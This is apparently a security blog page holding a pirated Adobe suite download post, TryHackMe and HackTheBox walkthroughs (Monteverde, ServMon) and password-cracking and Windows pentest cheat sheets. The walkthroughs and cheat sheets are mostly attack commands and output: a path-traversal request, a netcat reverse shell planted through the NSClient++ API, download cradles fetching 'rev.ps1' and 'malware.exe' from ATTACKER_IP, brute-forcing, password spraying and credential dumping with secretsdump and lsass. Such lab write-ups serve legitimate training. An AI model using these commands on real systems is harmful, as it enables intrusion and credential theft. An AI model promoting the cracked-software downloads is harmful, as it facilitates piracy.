Information Technology | Softwares - Graphics - Programming - Hacking - Security

Laladee

We Provide Knowledge About Information Technology.

Laladee

About Programs And Software Computer.

Laladee

Hacking And Security.

Laladee

And Computer Graphic Design.

Laladee

World is Open Source. Type cat vmlinuz > /dev/audio to hear the Voice of God !!

Jul 19, 2020

Download Full Adobe Creative Cloud Suite 2020 Full New Update | Free Download




Application Icon





File Icon






Folder Icon






Some Splash Screen






Download Adobe After Effects 2020


Download Adobe Animate 2020


Download Adobe Character Animator 2020


Download Adobe Dimension 2020


Download Adobe Illustrator 2020


Download Adobe InDesign 2020


Download Adobe Photoshop Lightroom Classic 2020


Download Adobe Media Encoder 2020


Download Adobe Photoshop 2020


Download Adobe Premiere Pro 2020


Download Adobe XD 2020
Just Install then Enjoy!



Share:

Jun 29, 2020

TryHackMe - Linux PrivEsc Arena


Link room: https://tryhackme.com/room/linuxprivescarena
This room very basic about PrivEsc in linux. All most task is show the ways to get root shell by tutorial very detailed. I has note some task to complete this room, maybe helpful

Task 2
Login as TCM with SSH: ssh TCM@<machine ip>
password: Hacker123

Task 4

Read credentials file: cat /etc/openvpn/auth.txt
We will see password321 as password and user as username

Task 5
#1: TCM trying to log into mysql
#2: TCM trying to log in as root
#3: Password: password123

Task 6
Run "ls -al /etc/" and -rw-rw-r-- is permissions of shadow file

Task 7
Run "find / -name id_rsa 2> /dev/null" We will get the path of id_rsa file: /backups/supersecretkeys/id_rsa
Read and save it with name id_rsa, run "chmod 400 id_rsa" to set mode permissions and we can login as root by ssh without password: ssh -i id_rsa root@<machine ip>

Task 12
Run "dpkg -l | grep nginx"
We see the version of nginx is 1.6.2-5, This version has a vulnerability allow local users with access to the web server user account to gain root privileges via a symlink attack on the error log
#1 Answer: CVE-2016-1247
We can see the PoC in /home/user/tools/nginx/nginxed-root.sh file or exploit code at link:
https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/nginxrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"

#2: It show SUIDBIN="/usr/bin/sudo". so sudo is SUID enabled and assists in the attack


Wonderful knowledge for beginners, thanks to TCM
Share:

May 1, 2020

HackTheBox Machine Write-up | Magic Walkthrough

For write-up of the Active machine, you need root flag as password to read.
Starting from Traceback machine, the flag is dynamic so writeup will public when the machine is retired.


Share:

Apr 20, 2020

HackTheBox Machine Write-up | Monteverde Walkthrough

┌─[laladee@parrot]─[~/Downloads]
└──╼ $sudo nmap -sV -sT -Pn -sC -O 10.10.10.172 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-20 05:27 BST
Nmap scan report for 10.10.10.172
Host is up (0.27s latency).
Not shown: 65516 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-04-20 03:55:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49703/tcp open  msrpc         Microsoft Windows RPC
49775/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=4/20%Time=5E9D283E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -47m30s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-04-20T03:57:38
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1206.98 seconds

After enum, we have couple usernames:
MEGABANK\Administrator
MEGABANK\krbtgt
MEGABANK\AAD_987d7f2f57d2
MEGABANK\mhope
MEGABANK\SABatchJobs
MEGABANK\svc-ata
MEGABANK\svc-bexec
MEGABANK\svc-netapp
MEGABANK\dgalanos
MEGABANK\roleary
MEGABANK\smorgan

I tried some ways to login, and I were able to access SMB of SABatchJobs with password as username


┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $smbclient -U SABatchJobs -L \\10.10.10.172
Enter WORKGROUP\SABatchJobs's password: 

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
azure_uploads   Disk      
C$              Disk      Default share
E$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
SYSVOL          Disk      Logon server share 
users$          Disk      
SMB1 disabled -- no workgroup available

We can see user can has access to "user$" directory

┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $smbclient //10.10.10.172/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jan  3 13:12:48 2020
  ..                                  D        0  Fri Jan  3 13:12:48 2020
  dgalanos                            D        0  Fri Jan  3 13:12:30 2020
  mhope                               D        0  Fri Jan  3 13:41:18 2020
  roleary                             D        0  Fri Jan  3 13:10:30 2020
  smorgan                             D        0  Fri Jan  3 13:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd dgalanos
smb: \dgalanos\> dir
  .                                   D        0  Fri Jan  3 13:12:30 2020
  ..                                  D        0  Fri Jan  3 13:12:30 2020
524031 blocks of size 4096. 519955 blocks available
smb: \dgalanos\> cd ..
smb: \> dir mhope
  mhope                               D        0  Fri Jan  3 13:41:18 2020
524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> dir
  .                                   D        0  Fri Jan  3 13:41:18 2020
  ..                                  D        0  Fri Jan  3 13:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 13:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> type azure.xml
type: command not found
smb: \mhope\> more azure.xml
getting file \mhope\azure.xml of size 1212 as /tmp/smbmore.3eGmOU (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
"/tmp/smbmore.3eGmOU" may be a binary file.  See it anyway? 
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \mhope\> ^Z
[1]+  Stopped                 smbclient //10.10.10.172/users$ -U SABatchJobs


azure.xml:
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>

Ok now we have password of user "mhope"

┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> type ..\Desktop\user.txt
4961976bd7d8f4eeb2ce3705e2f212f2
*Evil-WinRM* PS C:\Users\mhope\Documents> 


GETTING ROOT
*Evil-WinRM* PS C:\Users\mhope\Documents> cd C:\
*Evil-WinRM* PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448
*Evil-WinRM* PS C:\> 

After few mins google search about MEGABANK\Azure Admins 
I found vulnerability: https://blog.xpnsec.com/azuread-connect-for-redteam/


┌─[laladee@parrot]─[~/Downloads]
└──╼ $wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
┌─[laladee@parrot]─[~/Downloads]
└──╼ $python -m SimpleHTTPServer 1337
┌─[✗]─[laladee@parrot]─[~]
└──╼ $evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> Invoke-WebRequest "http://10.10.14.81:1337/Azure-ADConnect.ps1" -OutFile "C:\Users\mhope\Desktop\Azure_meo.ps1"
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir

    Directory: C:\Users\mhope\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/19/2020   9:46 PM           1454 AzureAD-Connect.ps1
-a----        4/19/2020  10:42 PM           2264 Azure_meo.ps1
-a----        4/19/2020   9:40 PM           1453 Connect.ps1
-ar---         1/3/2020   5:48 AM             32 user.txt

*Evil-WinRM* PS C:\Users\mhope\Desktop> import-module ./Azure_meo.ps1
*Evil-WinRM* PS C:\Users\mhope\Desktop> Azure_meo
The term 'Azure_meo' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Azure_meo
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Azure_meo:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
    
*Evil-WinRM* PS C:\Users\mhope\Desktop> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain:  MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!
*Evil-WinRM* PS C:\Users\mhope\Desktop> exit

┌─[laladee@parrot]─[~/Downloads]
└──╼ $evil-winrm -u Administrator -p d0m@in4dminyeah! -i 10.10.10.172

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
12909612d25c8dcf6e5a07d1a804a0bc
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

Share:

Apr 19, 2020

HackTheBox Machine Write-up | ServMon Walkthrough


[ Laladee ~/Downloads ]# nmap -A 10.10.10.184 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-15 10:08 UTC
Nmap scan report for 10.10.10.184
Host is up (0.27s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|     AuthInfo:
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|_    </html>
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  tcpwrapped
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=4/15%Time=5E96DD61%P=x86_64-unknown-linux-gnu%r
SF:(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r
SF:\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r
SF:\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x20
SF:1\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml
SF:1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999
SF:/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\
SF:x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x2
SF:0\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(HTTPO
SF:ptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nCon
SF:tent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xe
SF:f\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\
SF:x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-tra
SF:nsitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtm
SF:l\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<s
SF:cript\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20w
SF:indow\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20
SF:</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RTSPReques
SF:t,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-
SF:Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb
SF:\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Tr
SF:ansitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transiti
SF:onal\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\
SF:r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script
SF:\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window
SF:\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</scr
SF:ipt>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(FourOhFourReque
SF:st,65,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-type:\x20text/html\r
SF:\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/15%OT=21%CT=1%CU=33911%PV=Y%DS=2%DC=T%G=Y%TM=5E96DDD
OS:8%P=x86_64-unknown-linux-gnu)SEQ(SP=100%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=
OS:S%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DN
OS:W8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN
OS:(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
OS:T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A
OS:=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%D
OS:F=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=8
OS:0%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m58s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-15T10:13:57
|_  start_date: N/A

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   266.12 ms 10.10.14.1
2   476.44 ms 10.10.10.184

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 186.64 seconds

Login to FTP as Anonymous user and download Confidential.txt file

ftp> cd Users
ftp> cd Nadine
ftp> get Confidential.txt

After visiting 10.10.10.184 it showed login page hence searched for NVMS-1000 exploit:
Link : https://www.exploit-db.com/exploits/47774

GET  /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1

We should remember the contents of Confidential.txt .
 “I left your Passwords.txt file on your Desktop”

GET  /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1

You will find the hashes:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Saved the hashes in a "pass.txt" file and made a one more file with usernames nathan and nadine as "users.txt":

Now use Hydra to find login credentials for SSH. Fire following command:
laladee@parrot:~# hydra -L users.txt -P pass.txt 10.10.10.184 ssh
[22][ssh] host: 10.10.10.184  login: nadine  password: L1k3B1gBut7s@W0rk

Login to SSH:
laladee@parrot:~# ssh nadine@10.10.10.184
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]         
© 2019 Microsoft Corporation. All rights reserved.
                                                 
nadine@SERVMON C:\Users\Nadine>
Now got to:
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
GOT FLAG

Time to find NSClient password
C:\"program files"\nsclient++\nsclient.ini
found password: ew2x6SsGTxjRwXOT

According to this configs, we have to call the web page via 127.0.0.1
Now check on which port NSClient service is running:
nadine@SERVMON C:\Program Files\NSClient++>netstat -a
You will find that it's running on port 8443
As we’ve already seen in Nmap results, it needs to a web page with localhost SSL.

Create "meo.bat" file:
@echo off
C:\Temp\nc.exe 10.10.14.32 4444 -e cmd.exe

Start SimpleHTTPServer:
laladee@parrot:~# python -m SimpleHTTPServer 1337
Serving HTTP on 0.0.0.0 port 1337 ...

Download nc.exe and meo.bat file:
nadine@SERVMON C:\>powershell.exe wget "http://10.10.14.32:1337/nc.exe" -outfile "c:\Temp\nc.exe"
nadine@SERVMON C:\>powershell.exe wget "http://10.10.14.32:1337/meo.bat" -outfile "c:\Temp\meo.bat"

Go to terminal and start the listner:
laladee@parrot:~# nc -lvnp 4444
listening on [any] 4444 ...

After reading NSClient++ api and got some hint, we can add and execute our bat file with the following command:

nadine@SERVMON C:\>cd temp
nadine@SERVMON C:\Temp>curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/meo.bat --data-binary "C:\Temp\nc.exe 10.10.14.32 4444 -e cmd.exe"
nadine@SERVMON C:\Temp>curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/
type the admin's password that we found:
ew2x6SsGTxjRwXOT

Now check your listner
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt

Share:

Apr 16, 2020

Crack Password Cheat Sheet | How to crack and brute force passwords


Cracking password protected PDF files
$ pdfcrack -f <pdf file> -w <wordlist>

Cracking Web-Application Passwords
Get Request:
$ hydra -L <usernames list> -P <passwords list> <target ip> http-get <path to admin panel>
Post Request:
$ hydra -L <usernames list> -P <passwords list> <target ip> http-form-post "<Login Page>:<Request Body with ^USER^ and ^PWD^>:<Error Message>"
e.g: hydra -L <usernames list> -P <passwords list> <target ip> http-form-post "/dvwa/login.php:username=^USER^&password^PASS^:<Error Message>"

Wordpress:
$ wpscan --url <target ip/wp-login> -U <usernames list> -P <passwords list>

Cracking SSH Passwords
$ hydra -L <username list> -P <passwords list> 10.10.10.180 ssh 
$ ncrack -U <usernames list> -P <passwords list> ssh://10.10.10.180 
Cracking FTP Passwords 
$ hydra -L <usernames list> -P <passwords list> 10.10.10.180 ftp 
$ ncrack -U <usernames list> -P <passwords list> ftp://10.10.10.180
Cracking Passwords when Service uses non-standard port
$ hydra -L <username list> -P <passwords list> -s <port> 10.10.10.180 ssh 
$ ncrack -U <usernames list> -P <passwords list> 10.10.10.180:<port> 


Identifying Hash Types: 
$ hashid <file containing hashes> 
$ hashid -m <file containing hashes> # Shows hashcat mode 
$ hashid -j <file containing hashes> # Shows john format 

Converting encrypted files into a format supported by John: 
$ unshadow <etc_passwd file> <etc_shadow_file> > unshadowed.file 
$ ssh2john.py <encrypted SSH key file> > SSHkey.john 
$ keepass2john <kdb file> > keepass_hash.john 
$ rar2john <encrypted rar file> > rar file hash.john 
$ 7z2john <ecnrypted 7z file> > 7zfilehash.john 

Cracking Hashes Using John The Ripper: 
$ john --list=formats # outputs all supported format 
$ john <hash file> --wordlist=<path to wordlist> 
$ john <hash file> --show (shows cracked hashes) 
$ john <hash file> --wordlist=<path to wordlist> --format=<hash format> 
$ john <hash file> --incremental # uses ASCII incremental mode 
$ john <hash file> --incremental=digits # uses digit incremental
# mode : 0 to 99999999999999999999 



Craching Hashes Using HashCat: 
$ hashcat -m <hash type mode> -a <attack mode> <hash file> <path to wordlist> 

HashCat Attack Modes (-a):
0 : Straight 
1 : Combination 
3 : Brute-force 

HashCat Hash Types (-m): 
Linux OS Hashes:
500 : MD5 ($1$)
3200 : Blowfish ($2$)
7400 : SHA256 ($5)
1800 : SHA512 ($6$)

Windows OS Hashes:
1000 : NTLM 
3000 : LM 

MacOS Hashes:
122 : MacOS v10.4,10.5,10.6 
1722 : MacOS v10.7 
7100 : MacOS v10.8+ 

Application hashes 
900 : MD4 
0 : MD5 
100 : SHAl 
1400 : SHA2-256 
1700 : SHA2-512 
17400 : SHA3-256 
17600 : SHA3-512 

Network Protocol Hashes: 
7500 : Kerberos 5 
10200 : CRAM-MD5 
11100 : PostGreSQL CRAM (MD5)
11200 : MySQL CRAM (SHA1) 
16500 : Json Web Token 

Salted Hashes:
10 : MD5 ($pass.$salt)
20 : MD5 ($salt.$pass) 
110 : SHAl ($pass.$salt) 
1410 : SHA256 ($pass.$salt) 
1420 : SHA256 ($salt$pass)
1710 : SHA512 ($pass.$salt) 
1720 : SHA512 ($salt.$pass) 
Share:

Apr 15, 2020

Windows Penetration Testing Cheat Sheet


Ldap enumeration
$ enum4linux -a 10.10.10.180
$ smbclient -L \\10.10.10.180 -N
$ ldapsearch -x -H ldap://10.10.10.180 -b "dc=DOMAIN,dc=LOCAL"
$ python windapsearch.py -u username -p password -d DOMAIN.LOCAL --dc-ip 10.10.10.180
$ python ad-ldap-enum.py -d DOMAIN.LOCAL -l 10.10.10.180 -u username -p password

Find some useful credentials:
$ GetNPUsers.py -dc-ip 10.10.10.180 -no-pass "DOMAIN.LOCAL/username"
$ smbclient -U username -L \\10.10.10.180

Connect
$ evil-winrm -i 10.10.10.180 -u username -p password
$ psexec.py username:password@10.10.10.180
$ wmiexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff Username@10.10.10.180


Crack/Bruteforce
$ hashcat -m 18200 -a 0 -w 3 hashfile.hash rockyou.txt
Username brute:
$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.180 users.txt
Password brute
$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.180 rockyou.txt username123

Password spray
$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.180 users.txt rockyou.txt
https://github.com/dafthack/DomainPasswordSpray
> Import-Module .\DomainPasswordSpray.ps1
> Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt

Crack Tickets:
$ python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi

CrackMapExec:
$ crackmapexec smb 10.10.10.180 -u '' -p ''
$ crackmapexec <protocol> 10.10.10.180


Changing Permissions of a File: 
> icacls file.txt /grant Everyone:F

Downloading files
> IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")
> (New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:\Windows\Temp\malware.exe")  
> Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:\Windows\Temp\malware.exe"  
> certutil.exe -urlcache -split -f "http://10.10.10.180:80/shell.exe" shell.exe



Privilege Escalation:
Autlogon settings:
> Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
Dump:
$ secretsdump.py -dc-ip 10.10.10.180 defaultUserName:defaultPassword\!@10.10.10.180
Dump SAM file:
$ impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

NTDS.dit dump:
$ secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result local
$ crackmapexec.py 10.10.10.180 -u username -p password -d DOMAIN.LOCAL --ntds drsuapi

on DC, lsass.exe can dump hashes
> lsadump::lsa /inject


Recon:
> systeminfo
> hostname 

Especially good with hotfix info
> wmic qfe get Caption,Description,HotFixID,InstalledOn

What users/localgroups are on the machine?
> net users
> net localgroups
> net localgroup Administrators
> net user username

Crosscheck local and domain too
> net user username /domain
> net group Administrators /domain

Network information
> ipconfig /all
> route print
> arp -A

To see what tokens we have 
> whoami /priv

What we can access?
> whoami /groups

Recursive string scan
> findstr /spin "password" *.*

Running processes
> tasklist /SVC
